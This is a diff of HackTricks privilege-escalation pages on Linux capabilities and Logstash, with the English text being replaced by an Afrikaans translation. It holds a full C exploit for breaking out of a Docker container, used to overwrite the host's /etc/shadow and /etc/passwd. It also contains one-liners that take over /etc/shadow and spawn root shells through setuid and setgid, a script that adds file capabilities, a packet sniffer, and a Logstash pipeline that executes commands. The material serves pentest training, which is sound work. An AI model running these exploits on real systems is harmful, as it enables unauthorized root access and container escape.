"};\n"); -} +fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, +h -> handle_type); +for (int i = 0; i < h -> handle_bytes; ++i) { +fprintf(stderr, "0x%02x", h -> f_handle[i]); +if ((i + 1) % 20 == 0) +fprintf(stderr, "\n"); +if (i < h -> handle_bytes - 1) +fprintf(stderr, ", "); +} +fprintf(stderr, "};\n"); +} int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR * dir = NULL; - struct dirent * de = NULL; - path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); - oh -> handle_type = 1; - oh -> handle_bytes = 8; - return 1; - } - ++path; - fprintf(stderr, "[*] Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) - die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found %s\n", de -> d_name); - if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); - ino = de -> d_ino; - break; - } - } - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, & ino, sizeof(ino)); - memcpy(outh.f_handle + 4, & i, sizeof(i)); - if ((i % (1 << 20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); - if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle( & outh); - return find_handle(bfd, path, & outh, oh); - } - } - } - closedir(dir); - close(fd); - return 0; +int fd; +uint32_t ino = 0; +struct my_file_handle outh = { +.handle_bytes = 8, +.handle_type = 1 +}; +DIR * dir = NULL; +struct dirent * de = NULL; +path = strchr(path, '/'); +// recursion stops if path has been resolved +if (!path) { +memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); +oh -> handle_type = 1; +oh -> handle_bytes = 8; +return 1; +} +++path; +fprintf(stderr, "[*] Resolving '%s'\n", path); +if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) +die("[-] open_by_handle_at"); +if ((dir = fdopendir(fd)) == NULL) +die("[-] fdopendir"); +for (;;) { +de = readdir(dir); +if (!de) +break; +fprintf(stderr, "[*] Found %s\n", de -> d_name); +if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { +fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); +ino = de -> d_ino; +break; +} +} +fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); +if (de) { +for (uint32_t i = 0; i < 0xffffffff; ++i) { +outh.handle_bytes = 8; +outh.handle_type = 1; +memcpy(outh.f_handle, & ino, sizeof(ino)); +memcpy(outh.f_handle + 4, & i, sizeof(i)); +if ((i % (1 << 20)) == 0) +fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); +if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { +closedir(dir); +close(fd); +dump_handle( & outh); +return find_handle(bfd, path, & outh, oh); +} +} +} +closedir(dir); +close(fd); +return 0; } int main(int argc, char * argv[]) { - char buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = { - 0x02, - 0, - 0, - 0, - 0, - 0, - 0, - 0 - } - }; - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - read(0, buf, 1); - // get a FS reference from something mounted in from outside - if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) - die("[-] open"); - if (find_handle(fd1, argv[1], & root_h, & h) <= 0) - die("[-] Cannot find valid handle!"); - fprintf(stderr, "[!] Got a final handle!\n"); - dump_handle( & h); - if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) - die("[-] open_by_handle"); - char * line = NULL; - size_t len = 0; - FILE * fptr; - ssize_t read; - fptr = fopen(argv[2], "r"); - while ((read = getline( & line, & len, fptr)) != -1) { - write(fd2, line, read); - } - printf("Success!!\n"); - close(fd2); - close(fd1); - return 0; +char buf[0x1000]; +int fd1, fd2; +struct my_file_handle h; +struct my_file_handle root_h = { +.handle_bytes = 8, +.handle_type = 1, +.f_handle = { +0x02, +0, +0, +0, +0, +0, +0, +0 +} +}; +fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" +"[***] The tea from the 90's kicks your sekurity again. [***]\n" +"[***] If you have pending sec consulting, I'll happily [***]\n" +"[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); +read(0, buf, 1); +// get a FS reference from something mounted in from outside +if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) +die("[-] open"); +if (find_handle(fd1, argv[1], & root_h, & h) <= 0) +die("[-] Cannot find valid handle!"); +fprintf(stderr, "[!] Got a final handle!\n"); +dump_handle( & h); +if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) +die("[-] open_by_handle"); +char * line = NULL; +size_t len = 0; +FILE * fptr; +ssize_t read; +fptr = fopen(argv[2], "r"); +while ((read = getline( & line, & len, fptr)) != -1) { +write(fd2, line, read); +} +printf("Success!!\n"); +close(fd2); +close(fd1); +return 0; } ``` +Om die docker-container te ontsnap, kan jy die lêers `/etc/shadow` en `/etc/passwd` van die gasheer **aflaai**, 'n **nuwe gebruiker** daaraan **toevoeg**, en **`shocker_write`** gebruik om hulle te oorskryf. Daarna, **toegang** via **ssh**. -In order to scape the docker container you could **download** the files `/etc/shadow` and `/etc/passwd` from the host, **add** to them a **new user**, and use **`shocker_write`** to overwrite them. Then, **access** via **ssh**. - -**The code of this technique was copied from the laboratory of "Abusing DAC\_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com) +**Die kode van hierdie tegniek is gekopieer uit die laboratorium van "Abusing DAC\_OVERRIDE Capability" van** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com) ## CAP\_CHOWN -**This means that it's possible to change the ownership of any file.** +**Dit beteken dat dit moontlik is om die eienaarskap van enige lêer te verander.** -**Example with binary** - -Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges: +**Voorbeeld met binêre** +Stel dat die **`python`** binêre hierdie vermoë het, kan jy die **eienaar** van die **shadow**-lêer **verander**, die root wagwoord **verander**, en voorregte verhoog: ```bash python -c 'import os;os.chown("/etc/shadow",1000,1000)' ``` - -Or with the **`ruby`** binary having this capability: - +Of met die **`ruby`** binêre lêer wat hierdie vermoë het: ```bash ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")' ``` - ## CAP\_FOWNER -**This means that it's possible to change the permission of any file.** +**Dit beteken dat dit moontlik is om die toestemming van enige lêer te verander.** -**Example with binary** - -If python has this capability you can modify the permissions of the shadow file, **change root password**, and escalate privileges: +**Voorbeeld met binêre** +As python hierdie vermoë het, kan jy die toestemmings van die skadulêer wysig, **die root wagwoord verander**, en voorregte verhoog: ```bash python -c 'import os;os.chmod("/etc/shadow",0666) ``` - ### CAP\_SETUID -**This means that it's possible to set the effective user id of the created process.** +**Dit beteken dat dit moontlik is om die effektiewe gebruikers-ID van die geskepde proses te stel.** -**Example with binary** - -If python has this **capability**, you can very easily abuse it to escalate privileges to root: +**Voorbeeld met binêre** +As python hierdie **vermoë** het, kan jy dit baie maklik misbruik om voorregte na root te verhoog: ```python import os os.setuid(0) os.system("/bin/bash") ``` - -**Another way:** - +**Nog 'n manier:** ```python import os import prctl @@ -1306,17 +1251,15 @@ prctl.cap_effective.setuid = True os.setuid(0) os.system("/bin/bash") ``` - ## CAP\_SETGID -**This means that it's possible to set the effective group id of the created process.** +**Dit beteken dat dit moontlik is om die effektiewe groep-id van die geskep proses te stel.** -There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). +Daar is baie lêers wat jy kan oorskryf om voorregte te verhoog, [**jy kan idees hier kry**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). -**Example with binary** - -In this case you should look for interesting files that a group can read because you can impersonate any group: +**Voorbeeld met binêre** +In hierdie geval moet jy soek na interessante lêers wat 'n groep kan lees omdat jy enige groep kan voorstel: ```bash #Find every file writable by a group find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null @@ -1325,30 +1268,25 @@ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null #Find every file readable by a group in /etc with a maxpath of 1 find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null ``` - -Once you have find a file you can abuse (via reading or writing) to escalate privileges you can **get a shell impersonating the interesting group** with: - +Sodra jy 'n lêer gevind het wat jy kan misbruik (deur te lees of te skryf) om voorregte te verhoog, kan jy **'n skulp impersonateer as die interessante groep** met: ```python import os os.setgid(42) os.system("/bin/bash") ``` - -In this case the group shadow was impersonated so you can read the file `/etc/shadow`: - +In hierdie geval is die groep shadow geïmpersonaliseer sodat jy die lêer `/etc/shadow` kan lees: ```bash cat /etc/shadow ``` - -If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket). +As **docker** geïnstalleer is, kan jy die **docker-groep** **impersonate** en dit misbruik om te kommunikeer met die [**docker-socket** en voorregte te verhoog](./#writable-docker-socket). ## CAP\_SETFCAP -**This means that it's possible to set capabilities on files and processes** +**Dit beteken dat dit moontlik is om voorregte op lêers en prosesse in te stel** -**Example with binary** +**Voorbeeld met binêre** -If python has this **capability**, you can very easily abuse it to escalate privileges to root: +As python hierdie **voorreg** het, kan jy dit baie maklik misbruik om voorregte na root te verhoog: {% code title="setcapability.py" %} ```python @@ -1371,24 +1309,21 @@ cap_t = libcap.cap_from_text(cap) status = libcap.cap_set_file(path,cap_t) if(status == 0): - print (cap + " was successfully added to " + path) +print (cap + " was successfully added to " + path) ``` {% endcode %} - ```bash python setcapability.py /usr/bin/python2.7 ``` - {% hint style="warning" %} -Note that if you set a new capability to the binary with CAP\_SETFCAP, you will lose this cap. +Let daarop dat as jy 'n nuwe vermoë aan die binêre lêer toeken met CAP\_SETFCAP, sal jy hierdie vermoë verloor. {% endhint %} -Once you have [SETUID capability](linux-capabilities.md#cap\_setuid) you can go to its section to see how to escalate privileges. +Sodra jy die [SETUID-vermoë](linux-capabilities.md#cap\_setuid) het, kan jy na sy afdeling gaan om te sien hoe om voorregte te verhoog. -**Example with environment (Docker breakout)** - -By default the capability **CAP\_SETFCAP is given to the proccess inside the container in Docker**. You can check that doing something like: +**Voorbeeld met omgewing (Docker-ontsnapping)** +Standaard word die vermoë **CAP\_SETFCAP aan die proses binne die houer in Docker gegee**. Jy kan dit nagaan deur iets soos die volgende te doen: ```bash cat /proc/`pidof bash`/status | grep Cap CapInh: 00000000a80425fb @@ -1396,14 +1331,12 @@ CapPrm: 00000000a80425fb CapEff: 00000000a80425fb CapBnd: 00000000a80425fb CapAmb: 0000000000000000 - -capsh --decode=00000000a80425fb + +capsh --decode=00000000a80425fb 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap ``` - -This capability allow to **give any other capability to binaries**, so we could think about **escaping** from the container **abusing any of the other capability breakouts** mentioned in this page.\ -However, if you try to give for example the capabilities CAP\_SYS\_ADMIN and CAP\_SYS\_PTRACE to the gdb binary, you will find that you can give them, but the **binary won’t be able to execute after this**: - +Hierdie vermoë maak dit moontlik om **enige ander vermoë aan bineêre lêers te gee**, so ons kan dalk dink aan **ontsnapping** uit die houer deur misbruik te maak van enige van die ander vermoë-uitbrake wat op hierdie bladsy genoem word.\ +Maar as jy byvoorbeeld die vermoëns CAP\_SYS\_ADMIN en CAP\_SYS\_PTRACE aan die gdb-binêre lêer probeer gee, sal jy vind dat jy hulle kan gee, maar die **binêre lêer sal nie in staat wees om uitgevoer te word nie**: ```bash getcap /usr/bin/gdb /usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip @@ -1413,27 +1346,25 @@ setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb /usr/bin/gdb bash: /usr/bin/gdb: Operation not permitted ``` - -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: This is a **limiting superset for the effective capabilities** that the thread may assume. It is also a limiting superset for the capabilities that may be added to the inheri‐table set by a thread that **does not have the CAP\_SETPCAP** capability in its effective set._\ -It looks like the Permitted capabilities limit the ones that can be used.\ -However, Docker also grants the **CAP\_SETPCAP** by default, so you might be able to **set new capabilities inside the inheritables ones**.\ -However, in the documentation of this cap: _CAP\_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\ -It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP\_SYS\_ADMIN or CAP\_SYS\_PTRACE in the inherit set to escalate privileges**. +[Van die dokumentasie](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Toegelaat: Dit is 'n **beperkende superset vir die effektiewe vermoëns** wat die draad mag aanneem. Dit is ook 'n beperkende superset vir die vermoëns wat deur 'n draad by die erflike stel gevoeg kan word as dit nie die CAP\_SETPCAP-vermoë in sy effektiewe stel het nie._\ +Dit lyk asof die Toegelate vermoëns diegene beperk wat gebruik kan word.\ +Maar Docker verleen ook standaard die **CAP\_SETPCAP**, so jy kan dalk **nuwe vermoëns binne die erflike vermoëns stel**.\ +Maar in die dokumentasie van hierdie vermoë: _CAP\_SETPCAP: \[…] **voeg enige vermoë van die oproepdraad se begrensingsstel by sy erflike stel**_.\ +Dit lyk asof ons slegs vermoëns van die begrensingsstel by die erflike stel kan voeg. Dit beteken dat **ons nie nuwe vermoë soos CAP\_SYS\_ADMIN of CAP\_SYS\_PTRACE in die erflike stel kan plaas om voorregte te verhoog nie**. ## CAP\_SYS\_RAWIO -[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. +[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) bied 'n aantal sensitiewe verrigtinge, insluitend toegang tot `/dev/mem`, `/dev/kmem` of `/proc/kcore`, wysiging van `mmap_min_addr`, toegang tot `ioperm(2)` en `iopl(2)` stelseloproepe, en verskeie skyfopdragte. Die `FIBMAP ioctl(2)` is ook geaktiveer deur hierdie vermoë, wat in die [verlede](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html) probleme veroorsaak het. Volgens die manblad maak dit ook die houer in staat om beskrywend `verskeie toestelspesifieke verrigtinge op ander toestelle uit te voer`. -This can be useful for **privilege escalation** and **Docker breakout.** +Dit kan nuttig wees vir **voorregverhoging** en **Docker-ontsnapping**. ## CAP\_KILL -**This means that it's possible to kill any process.** +**Dit beteken dat dit moontlik is om enige proses te beëindig.** -**Example with binary** - -Lets suppose the **`python`** binary has this capability. If you could **also modify some service or socket configuration** (or any configuration file related to a service) file, you could backdoor it, and then kill the process related to that service and wait for the new configuration file to be executed with your backdoor. +**Voorbeeld met binêre** +Laat ons aanneem dat die **`python`** binêre hierdie vermoë het. As jy **ook 'n diens- of soketkonfigurasie** (of enige konfigurasie-lêer wat verband hou met 'n diens) kon wysig, kon jy dit agterdeur maak en dan die proses wat verband hou met daardie diens doodmaak en wag vir die nuwe konfigurasie-lêer om met jou agterdeur uitgevoer te word. ```python #Use this python code to kill arbitrary processes import os @@ -1441,16 +1372,13 @@ import signal pgid = os.getpgid(341) os.killpg(pgid, signal.SIGKILL) ``` +**Privesc met kill** -**Privesc with kill** - -If you have kill capabilities and there is a **node program running as root** (or as a different user)you could probably **send** it the **signal SIGUSR1** and make it **open the node debugger** to where you can connect. - +As jy kill-vermoëns het en daar is 'n **node-program wat as root** (of as 'n ander gebruiker) loop, kan jy waarskynlik **die signaal SIGUSR1 stuur** en dit laat **die node-debugger oopmaak** waar jy kan koppel. ```bash kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` - {% content-ref url="electron-cef-chromium-debugger-abuse.md" %} [electron-cef-chromium-debugger-abuse.md](electron-cef-chromium-debugger-abuse.md) {% endcontent-ref %} @@ -1459,20 +1387,20 @@ kill -s SIGUSR1
-​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheid geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie en kuberveiligheid professionele in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## CAP\_NET\_BIND\_SERVICE -**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability. +**Dit beteken dat dit moontlik is om na enige poort te luister (selfs na bevoorregte poorte).** Jy kan nie voorregte direk verhoog met hierdie vermoë nie. -**Example with binary** +**Voorbeeld met binêre** -If **`python`** has this capability it will be able to listen on any port and even connect from it to any other port (some services require connections from specific privileges ports) +As **`python`** hierdie vermoë het, sal dit in staat wees om na enige poort te luister en selfs daarvandaan na enige ander poort te verbind (sommige dienste vereis verbindings vanaf spesifieke bevoorregte poorte) {% tabs %} -{% tab title="Listen" %} +{% tab title="Luister" %} ```python import socket s=socket.socket() @@ -1480,12 +1408,12 @@ s.bind(('0.0.0.0', 80)) s.listen(1) conn, addr = s.accept() while True: - output = connection.recv(1024).strip(); - print(output) +output = connection.recv(1024).strip(); +print(output) ``` {% endtab %} -{% tab title="Connect" %} +{% tab title="Verbind" %} ```python import socket s=socket.socket() @@ -1497,25 +1425,22 @@ s.connect(('10.10.10.10',500)) ## CAP\_NET\_RAW -[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) capability permits processes to **create RAW and PACKET sockets**, enabling them to generate and send arbitrary network packets. This can lead to security risks in containerized environments, such as packet spoofing, traffic injection, and bypassing network access controls. Malicious actors could exploit this to interfere with container routing or compromise host network security, especially without adequate firewall protections. Additionally, **CAP_NET_RAW** is crucial for privileged containers to support operations like ping via RAW ICMP requests. +[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html)-vermoë maak dit vir prosesse moontlik om **RAW- en PACKET-sokkels te skep**, wat hulle in staat stel om willekeurige netwerkpakkies te genereer en te stuur. Dit kan lei tot sekuriteitsrisiko's in gekonteneerde omgewings, soos pakketspoofing, verkeersinspuiting en omseil van netwerktoegangsbeheer. Kwaadwillige aktore kan dit uitbuit om te interfereer met gekonteneerde roeteverwerking of om die netwerksekuriteit van die gasheer in gevaar te stel, veral sonder voldoende firewallbeskerming. Daarbenewens is **CAP_NET_RAW** noodsaaklik vir bevoorregte gekonteneerde om operasies soos ping via RAW ICMP-versoeke te ondersteun. -**This means that it's possible to sniff traffic.** You cannot escalate privileges directly with this capability. +**Dit beteken dat dit moontlik is om verkeer af te luister.** Jy kan nie direk voorregte verhoog met hierdie vermoë nie. -**Example with binary** - -If the binary **`tcpdump`** has this capability you will be able to use it to capture network information. +**Voorbeeld met binêre lêer** +As die binêre lêer **`tcpdump`** hierdie vermoë het, sal jy dit kan gebruik om netwerkinligting vas te vang. ```bash getcap -r / 2>/dev/null /usr/sbin/tcpdump = cap_net_raw+ep ``` +Let wel dat as die **omgewing** hierdie vermoë gee, jy ook **`tcpdump`** kan gebruik om verkeer te onderskep. -Note that if the **environment** is giving this capability you could also use **`tcpdump`** to sniff traffic. - -**Example with binary 2** - -The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" (**localhost**) interface. The code is from the lab "_The Basics: CAP-NET\_BIND + NET\_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com) +**Voorbeeld met binêre 2** +Die volgende voorbeeld is **`python2`** kode wat nuttig kan wees om verkeer van die "**lo**" (**localhost**) koppelvlak te onderskep. Die kode kom van die laboratorium "_The Basics: CAP-NET\_BIND + NET\_RAW_" van [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com) ```python import socket import struct @@ -1523,11 +1448,11 @@ import struct flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"] def getFlag(flag_value): - flag="" - for i in xrange(8,-1,-1): - if( flag_value & 1 <
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevent in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n broeiplek vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/logstash.md b/linux-hardening/privilege-escalation/logstash.md index 1489b6bde..2c0abcd4a 100644 --- a/linux-hardening/privilege-escalation/logstash.md +++ b/linux-hardening/privilege-escalation/logstash.md @@ -1,94 +1,86 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## Logstash -Logstash is used to **gather, transform, and dispatch logs** through a system known as **pipelines**. These pipelines are made up of **input**, **filter**, and **output** stages. An interesting aspect arises when Logstash operates on a compromised machine. +Logstash word gebruik om **logs te versamel, transformeer en versprei** deur 'n stelsel wat bekend staan as **pipelines**. Hierdie pipelines bestaan uit **invoer**, **filter** en **uitvoer** fases. 'n Interessante aspek ontstaan wanneer Logstash op 'n gekompromitteerde masjien werk. -### Pipeline Configuration - -Pipelines are configured in the file **/etc/logstash/pipelines.yml**, which lists the locations of the pipeline configurations: +### Pipeline-konfigurasie +Pipelines word gekonfigureer in die lêer **/etc/logstash/pipelines.yml**, wat die plekke van die pipeline-konfigurasies lys: ```yaml # Define your pipelines here. Multiple pipelines can be defined. # For details on multiple pipelines, refer to the documentation: # https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html - pipeline.id: main - path.config: "/etc/logstash/conf.d/*.conf" +path.config: "/etc/logstash/conf.d/*.conf" - pipeline.id: example - path.config: "/usr/share/logstash/pipeline/1*.conf" - pipeline.workers: 6 +path.config: "/usr/share/logstash/pipeline/1*.conf" +pipeline.workers: 6 ``` +Hierdie lêer onthul waar die **.conf** lêers, wat pyplynkonfigurasies bevat, geleë is. Wanneer 'n **Elasticsearch uitsetmodule** gebruik word, is dit algemeen dat **pyplyne** **Elasticsearch-legitimasie** insluit, wat dikwels uitgebreide voorregte het as gevolg van Logstash se behoefte om data na Elasticsearch te skryf. Wildcards in konfigurasiepaaie stel Logstash in staat om alle ooreenstemmende pyplyne in die aangewese gids uit te voer. -This file reveals where the **.conf** files, containing pipeline configurations, are located. When employing an **Elasticsearch output module**, it's common for **pipelines** to include **Elasticsearch credentials**, which often possess extensive privileges due to Logstash's need to write data to Elasticsearch. Wildcards in configuration paths allow Logstash to execute all matching pipelines in the designated directory. +### Voorregverhoging deur Skryfbare Pyplyne -### Privilege Escalation via Writable Pipelines +Om voorregverhoging te probeer, identifiseer eers die gebruiker waaronder die Logstash-diens gewoonlik loop, tipies die **logstash**-gebruiker. Maak seker dat jy aan **een** van hierdie kriteria voldoen: -To attempt privilege escalation, first identify the user under which the Logstash service is running, typically the **logstash** user. Ensure you meet **one** of these criteria: +- Besit **skryftoegang** tot 'n pyplyn **.conf** lêer **of** +- Die **/etc/logstash/pipelines.yml** lêer gebruik 'n wildcard, en jy kan na die teikengids skryf -- Possess **write access** to a pipeline **.conf** file **or** -- The **/etc/logstash/pipelines.yml** file uses a wildcard, and you can write to the target folder +Daarbenewens moet **een** van hierdie voorwaardes vervul word: -Additionally, **one** of these conditions must be fulfilled: - -- Capability to restart the Logstash service **or** -- The **/etc/logstash/logstash.yml** file has **config.reload.automatic: true** set - -Given a wildcard in the configuration, creating a file that matches this wildcard allows for command execution. For instance: +- Die vermoë om die Logstash-diens te herlaai **of** +- Die **/etc/logstash/logstash.yml** lêer het **config.reload.automatic: true** ingestel +Met 'n wildcard in die konfigurasie, maak dit moontlik om 'n lêer te skep wat ooreenstem met hierdie wildcard en sodoende opdraguitvoering toe te laat. Byvoorbeeld: ```bash input { - exec { - command => "whoami" - interval => 120 - } +exec { +command => "whoami" +interval => 120 +} } output { - file { - path => "/tmp/output.log" - codec => rubydebug - } +file { +path => "/tmp/output.log" +codec => rubydebug +} } ``` +Hier bepaal **interval** die uitvoeringsfrekwensie in sekondes. In die gegewe voorbeeld word die **whoami**-opdrag elke 120 sekondes uitgevoer, met die uitvoer wat na **/tmp/output.log** gerig word. -Here, **interval** determines the execution frequency in seconds. In the given example, the **whoami** command runs every 120 seconds, with its output directed to **/tmp/output.log**. - -With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logstash will automatically detect and apply new or modified pipeline configurations without needing a restart. If there's no wildcard, modifications can still be made to existing configurations, but caution is advised to avoid 